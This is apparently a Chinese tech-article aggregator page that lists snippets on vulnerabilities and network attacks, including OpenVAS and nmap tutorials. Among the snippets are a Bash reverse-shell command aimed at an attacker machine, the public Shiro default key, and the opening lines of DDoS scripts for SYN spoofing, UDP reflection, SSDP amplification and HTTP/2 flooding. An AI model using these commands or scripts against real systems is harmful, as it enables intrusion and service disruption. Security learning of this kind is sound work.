E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
漏洞攻击
OpenVAS 工具使用全攻略
OpenVAS3.1初始化OpenVAS3.2设置管理员密码3.3启动服务四、使用OpenVAS进行扫描4.1登录Web界面4.2创建扫描任务4.3启动扫描4.4查看扫描结果五、结果分析与处理5.1风险等级评估5.2
漏洞
修复建议六
垚垚 Securify 前沿站
·
2025-02-17 08:06
网络
信息安全之网络安全
网络安全技术是一类包含内容极其广泛的技术,广义上说任何检测、防御和抵制网络
攻击
的技术都属于网络安全技术,而且很多网络安全技术都是
攻击
驱动型的。
黑客Jack
·
2025-02-17 06:20
web安全
安全
工控网络安全学习路线
接着学习C/C++,掌握面向过程和面向对象编程的基本概念和技术,为后续的
漏洞
挖掘和底层分析打下基础。最后学习Python,它在安全领域应用广泛,可用于自动化脚本编写、
漏洞
扫描和数据分析等。
206333308
·
2025-02-17 06:50
安全
2025年——【寒假】自学黑客计划(网络安全)
CSDN大礼包:基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包前言什么是网络安全网络安全可以基于
攻击
和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究
攻击
技术,而“蓝队”
网安CILLE
·
2025-02-17 06:20
web安全
网络
安全
网络安全
linux
在软件产品从开发到上线过程中,不同阶段可能出现哪些问题,导致软件最终出现线上bug
在软件产品从开发到上线的全生命周期中,不同阶段都可能因流程
漏洞
、技术疏忽或人为因素导致线上问题。
测试-东方不败之鸭梨
·
2025-02-17 06:47
测试基础
bug
数据库
解决方案之高效检测PDF文件中的XSS
攻击
问题
然而,PDF文件的安全性问题也日益凸显,尤其是跨站脚本
攻击
(Cross-SiteScripting,XSS)的威胁。
·
2025-02-17 03:57
企业文件安全:防范内部人员数据泄露风险
在企业文件安全管理中,外部黑客
攻击
常常受到广泛关注,然而,内部人员造成的数据泄露风险同样不容忽视。内部人员可能因疏忽、不满或被利益诱惑等原因,导致企业敏感文件数据泄露,给企业带来巨大损失。
够快云库
·
2025-02-17 02:50
企业数据安全
企业文件安全
物联网 网络安全 概述
物联网安全涉及保护物联网设备和系统免受
攻击
和未经授权的访问,这需要专业的知识和技能。下面是一些学习物联网安全的方法:1.理解物联网基础知识在开始学习物联网安全之前,您需要对物联网的基础知识有所了解。
网络安全King
·
2025-02-17 01:43
物联网
web安全
安全
后端使用Spring Boot框架 + 前端VUE 实现滑动模块验证码
在现在常用的登录验证码方式有很多种,但是都不可避免被
攻击
,但是有很多方式可以防止被
攻击
,从而进行维护。
ADFVBM
·
2025-02-17 01:06
前端
spring
boot
vue.js
网络安全入门信息收集与
漏洞
扫描(二)
主动信息收集1Nmap扫描端口与服务(1)Nmap是什么?定义:网络探测工具,用于扫描开放端口、识别服务及操作系统。典型用途:发现目标存活主机(ping扫描)。识别开放端口和运行的服务(如SSH、HTTP、数据库)。探测操作系统类型(Windows/Linux)。(2)基础扫描命令快速扫描常用端口:nmap-sV-T4192.168.1.100#-sV探测服务版本,-T4加速扫描示例输出:PORT
挣扎与觉醒中的技术人
·
2025-02-16 21:44
网络安全入门及实战
web安全
网络
安全
c++
程序人生
9 个构建安全 PHP 应用的开发技巧
有时,源自第三方API的数据格式混乱不堪,完全偏离预期;又或是用户输入一些稀奇古怪、让人摸不着头脑的字符串,令人防不胜防;还有可能隐藏着悄然引发安全
漏洞
的故障,在暗处伺机而动,给整个项目带来巨大风险。
程序员阿凡提
·
2025-02-16 19:29
PHP实战教程
php
Redis之父学生时代发现的ping
漏洞
的源码分析
不久之后,antirez发现了一个ping的
漏洞
,非root用
·
2025-02-16 19:21
当 Deepseek 频繁提示 “服务器繁忙“,我们该如何破局?
安全问题:如外部恶意
攻击
。服务维护与限制:如服务维护
晚风る
·
2025-02-16 18:52
AI人工智能
网络
Forrester发布2024年五大网络安全新威胁
文章目录前言一、大选年的叙事(舆论)操控
攻击
二、深度伪造引发身份安全危机三、生成式人工智能数据泄露四、人工智能软件供应链
攻击
五、太空成为安全战略高点数据泄露平均成本高达218万美元前言人工智能正重塑网络安全格局
岛屿旅人
·
2025-02-16 18:18
网络安全
web安全
网络
安全
网络安全
shiro 反序列化
漏洞
解决方案
问题版本shiro1.2.4官方默认key:kPH+bIxk5D2deZiIxcaaaA==获取相关信息解决方案:升级到更新版本:1.3.0兼容jdk1.7检测工具:shiro_attack-4.7.0-SNAPSHOT-all.zip
小明同学哦
·
2025-02-16 17:40
1024程序员节
WEB
漏洞
-XXE&XML之利用检测绕过
XXE"xmlexternalentityinjection"-XML外部实体注入
漏洞
服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入xml基本语法XML被设计用来结构化
网小白白
·
2025-02-16 16:37
xml
java
php
web
网络安全
网络安全从零开始学习CTF——CTF基本概念
CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实
攻击
进行技术比拼的方式。02」竞赛模式解题模式:在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参
Hacker_Oldv
·
2025-02-16 16:04
web安全
学习
安全
网络安全(黑客)——自学2024
一、什么是网络安全网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、
攻击
、损害或盗窃的一系列措施和技术。
白帽子黑客-宝哥
·
2025-02-16 16:34
web安全
安全
嵌入式硬件
网络
单片机
SYN-TFO伪造
攻击
.c
/*--------------------------------------------------*\SYN-TFO伪造
攻击
作者:alpha编译方法:gcc-osyntfosyntfo.c-pthread
金猪报喜-阿尔法
·
2025-02-16 15:26
c语言
安全
网络
UDP反射放大
攻击
.c
#include#include#include#include#include#include#include#include#include#include#defineMAX_PACKET_SIZE8192#definePHI0x9e3779b9#definePACKETS_PER_RESOLVER5staticuint32_tQ[4096],c=362436;structlist{stru
金猪报喜-阿尔法
·
2025-02-16 15:25
网络
安全
c语言
网络安全(黑客)——自学2025
基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包前言什么是网络安全网络安全可以基于
攻击
和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究
攻击
技术,而“蓝队”、“安全运营”、
网安大师兄
·
2025-02-16 13:16
web安全
安全
网络
网络安全
linux
自学网络安全(黑客技术)2024年 —100天学习计划
基于入门网络安全/黑客打造的:前言什么是网络安全网络安全可以基于
攻击
和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究
攻击
技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。
帝王挥剑指天下
·
2025-02-16 12:37
C++
web安全
学习
网络
自学网络安全(黑客技术)2024年 —100天学习计划
基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包前言什么是网络安全网络安全可以基于
攻击
和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究
攻击
技术,而“蓝队”、“安全运营”、
白帽黑客cst
·
2025-02-16 11:26
学习
网络
安全
web安全
linux
红队视角出发的k8s敏感信息收集——持久化存储与数据泄露
然而,从红队视角出发,这些存储卷也可能成为
攻击
者觊觎的目标。通过巧妙地利用配置不当或已知
漏洞
,
攻击
者能够从中收集到包括密钥、访问凭证在内的大量敏感数据,进而导致数据泄露事件的发生。
周周的奇妙编程
·
2025-02-16 10:51
kubernetes
容器
云原生
内网隧道代理技术(七)之Bash反弹shell
Bash反弹shellBash介绍Shell也称为终端或壳,是人与内核之间的翻译官,而Bash则是Linux中默认使用的ShellBash反弹Shell的命令如下:bash-i>&/dev/tcp/
攻击
机
怰月
·
2025-02-16 06:51
内网隧道代理技术
bash
linux
网络安全
安全
网络
大学信息安全技术 期末考试复习题
一、单选题(一)1、在以下人为的恶意
攻击
行为中,属于主动
攻击
的是()AA.数据篡改及破坏B.数据窃听C.数据流分析D.非法访问2、数据完整性指的是()CA.保护网络中各系统之间交换的数据,防止因数据被截获而造成泄密
网络安全Max
·
2025-02-16 06:46
网络
基于机器学习的网络安全态势感知模型研究与实现
随着网络
攻击
手段的不断升级和演变,传统的被动防御方式已经难以满足日益复杂的网络安全形势。
AI大模型应用之禅
·
2025-02-16 06:16
DeepSeek
R1
&
AI大模型与大数据
计算科学
神经计算
深度学习
神经网络
大数据
人工智能
大型语言模型
AI
AGI
LLM
Java
Python
架构设计
Agent
RPA
计算机网络--网络安全测试
答案:A云计算可以有效地防止网络
攻击
发生B网络
攻击
、病毒与垃圾邮件是网络安全的三大公害C网络
攻击
开始演变成某些国家或利益集团重要的政治、军事工具D趋利性是当前网络
攻击
的主要特点问题2得10分,满分10分以下关于网络安全的三大公害的描述中错误的是
黑客K-ing
·
2025-02-16 05:12
网络安全
网络协议
信号处理
信息与通信
每天一篇逻辑
漏洞
前言:水一篇文章,今天也没有去挖洞内容:学了那么多了,还没有长进,是不是我的学习方法有问题但是到底哪里有问题呢,我又不知道,我好像好久没有总结了,应该写一篇日记,然后总结的一篇文章,然后把日记的内容丢里面,感觉就挺好了,就不用去找文章了好了就这样,进入正题好了,今天学会伪造了jsonp的xss,就是说是json格式的话,不是jsonp格式,可以尝试在url后面加上callback,看是否有返回值
不灭锦鲤
·
2025-02-16 05:42
学习
Vulhub靶机 ActiveMQ 反序列化
漏洞
(CVE-2015-5254)(渗透测试详解)
一、开启vulhub环境docker-composeup-d启动dockerps查看开放的端口
漏洞
版本:ApacheActiveMQ5.x~ApacheActiveMQ5.13.0二、访问靶机IP8161
芜丶湖
·
2025-02-16 02:21
activemq
web安全
安全性测试
linux
网络
系统安全
网络安全---SQL注入
攻击
一、实验目的SQL注入是一种代码注入技术,可利用Web应用程序和数据库服务器之间接口中的
漏洞
。当用户的输入在发送到后端数据库服务器之前未在Web应用程序中正确检查时,该
漏洞
就存在。
犹若故人归
·
2025-02-16 02:20
网络
数据库
postgresql
web安全
docker
安全
sql
溯源-如何还原
攻击
路径
溯源-如何还原
攻击
路径1.web入侵流程2.windows-还原
攻击
路径3.linux-还原
攻击
路径1.web入侵流程信息收集->
漏洞
扫描->渗透
攻击
->提权->后渗透->持续控制2.windows-还原
攻击
路径日志分析
C Aires
·
2025-02-16 02:19
网络安全之溯源一
网络安全
网络
网络协议
筑墙扫漏检入侵网安三叉戟出阵
20世纪90年代中期,在互联网迅速发展时期的网络对抗格局中,“攻”的力量大致可以分成两类:一类是大量低层次、低技术、破坏性的
攻击
者,包括“脚本小子”;另一类是一小群深入研究、发现
漏洞
的技术高手。
Liana-Fany
·
2025-02-16 01:44
安全
web安全
网络
网络安全-
攻击
流程-传输层
传输层
攻击
主要针对OSI模型的第四层,涉及TCP和UDP协议的安全
漏洞
。
星河776(重名区分)
·
2025-02-16 01:44
网络安全
web安全
安全
学习
XSS
攻击
全貌:原理、分类、检测与防御策略研究
XSS
攻击
原理的深入剖析跨站脚本
攻击
(Cross-SiteScripting,简称XSS)作为一种广泛存在的web应用程序安全
漏洞
,其机制在于利用了客户端与服务器之间数据交换过程中的信任链被恶意破坏。
键盘侠伍十七
·
2025-02-15 22:47
web
安全
xss
网络
服务器
web安全
XSS攻击
常见的 Web
攻击
方式有哪些,如何防御?
一、XSS
攻击
(跨站脚本
攻击
)
攻击
原理:恶意脚本通过用户输入注入页面,分为存储型(数据库持久化)、反射型(URL参数注入)、DOM型(客户端脚本修改)防御方案://1.输入过滤(Node.js示例)constxss
程序员黄同学
·
2025-02-15 21:43
前端开发
JavaScript
Java面试题
前端
Memcached服务器UDP反射放大
攻击
1、前言2月28日,Memcache服务器被曝出存在UDP反射放大
攻击
漏洞
。
攻击
者可利用这个
漏洞
来发起大规模的DDoS
攻击
,从而影响网络正常运行。
weixin_30639719
·
2025-02-15 20:03
memcached
网络
操作系统
网络安全之反射放大型DDOS
背景据CERNET2014年10月的月报统计,其38个主节点中有超过一半检测到来自国内次数超过2200次、总流量超过16TB的NTP反射放大
攻击
;2016年10月美国Dyn公司的DNS服务器遭受DNS反射放大
攻击
与
tiezhuLee
·
2025-02-15 20:31
笔记
scapy
安全
网络
经验分享
HTTP/2 flood
攻击
脚本.js
consturl=require('url'),fs=require('fs'),http2=require('http2'),http=require('http'),tls=require('tls'),cluster=require('cluster'),axios=require('axios'),https=require('https'),UserAgent=require('user
金猪报喜-阿尔法
·
2025-02-15 19:56
安全
网络
java
【大数据安全分析】网络异常相关安全分析场景
随着信息技术的飞速发展,网络环境变得日益复杂,各种网络
攻击
手段层出不穷。在大数据安全分析领域,威胁情报关联和账号异常分析已经取得了较好的效果,而网络异常分析同样具有重要的价值。
扫地僧009
·
2025-02-15 18:20
大数据安全分析
网络
安全
大数据
web安全
网络安全-
攻击
流程-网络层
网络层
攻击
主要针对OSI模型中的第三层(网络层),涉及IP协议、路由机制等核心功能。
攻击
者通过操纵数据包、路由信息或协议
漏洞
实施破坏。
星河776(重名区分)
·
2025-02-15 16:00
网络安全
web安全
php
安全
网络安全
python——脚本实现检测目标ip是否存在文件包含
漏洞
python爬虫——request模块(一)_xiaochuhe的博客-CSDN博客_pythonrequestpython——正则表达式(一)_xiaochuhe的博客-CSDN博客举例dvwa——FileInclusion代码如下:importrequestsimportreurl=input("请输入需要检测的网址:
xiaochuhe--kaishui
·
2025-02-15 13:39
Python爬虫
漏洞挖掘
python
tcp/ip
安全
#最新#2025年护网#蓝队防守必须排查的57个安全
漏洞
与解决方案 (上)
免责声明本教程仅为合法的教学目的而准备,严禁用于任何形式的违法犯罪活动及其他商业行为,在使用本教程前,您应确保该行为符合当地的法律法规,继续阅读即表示您需自行承担所有操作的后果,如有异议,请立即停止本文章读。目录一、OA系统泛微(Weaver-Ecology-OA)致远(Seeyon)通达OA(TongDaOA)二、E-mailExchangeCoremail三、Web中间件ApacheWeblo
独行soc
·
2025-02-15 12:03
2025年护网
安全
web安全
面试
漏洞挖掘
文件读取漏洞
2025年护网
一文读懂 Windows 逆向工程中的滑板指令
滑板指令的其他用途五、总结与作业在Windows逆向工程领域,滑板指令(NOP指令,即No-Operation的缩写)是一项极为实用的技术,对于软件安全工程师而言,熟练掌握它,就如同掌握了一把开启软件破解与
漏洞
利用大门的钥匙
阿贾克斯的黎明
·
2025-02-15 12:33
C++
单片机
嵌入式硬件
sendmessage WM_PAINT 无效(6月19日)
今天意外发现替一哥们做的程序还有
漏洞
,点击弹出来的对话框的BUTTON时,发现主窗口(实际是VIEW啦)不自动重绘以产生相应图形。
Randyqiu
·
2025-02-15 11:50
VC/MFC
application
system
function
processing
each
button
漏洞
挖掘还能做副业
无论是黑客
攻击
、勒索病毒、数据泄露,还是国家间的信息战,网络安全已经成为现代社会的基础设施之一。所以,首先要明白学习网络安全的重要性:你不仅是在学习技术,更多的是在为自己和他人的安全“筑城
~小羊没烦恼~
·
2025-02-15 11:19
web安全
学习
网络
服务器
安全
30岁了,零基础想转行网安从头开始现实吗?
无论是大公司还是中小企业,都急需网络安全专家来防范黑客
攻击
、数据泄露以及其他各种网络威胁。这样的背景使得网络安全领域一直是个朝阳行业,需求巨大,人才紧缺。2.年龄不是问题在许多
白帽黑客勇哥
·
2025-02-15 10:18
网络安全
web安全
转行
linux
系统安全
Web项目测试专题(七)安全性测试
输入验证:测试所有用户输入点,防止SQL注入、XSS(跨站脚本
攻击
)等常见
攻击
。安全头配置:检查HTTP安全头(如CSP、X-Fram
2025年一定要上岸
·
2025-02-15 10:48
安全
web安全
SSDP反射放大DDOS
攻击
脚本.c
/*NEWANDIMPROVEDSSDPDDOSSCRIPT.*/#include#include#include#include#include#include#include#include#include#include#include#defineMAX_PACKET_SIZE8192#definePHI0x9e3779b9staticuint32_tQ[4096],c=362436;st
金猪报喜-阿尔法
·
2025-02-15 08:58
网络
安全
c语言
c#自动更新-源码
软件维护与升级修复
漏洞
和缺陷:软件在使用过程中可能会发现各种
漏洞
和缺陷,自动更新可以及时推送修复程序,增强软件的稳定性和安全性,避免因
漏洞
被利用而导致数据泄露、系统崩溃等问题。
未来之窗软件服务
·
2025-02-15 07:22
c#
服务器
网络
上一页
12
13
14
15
16
17
18
19
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他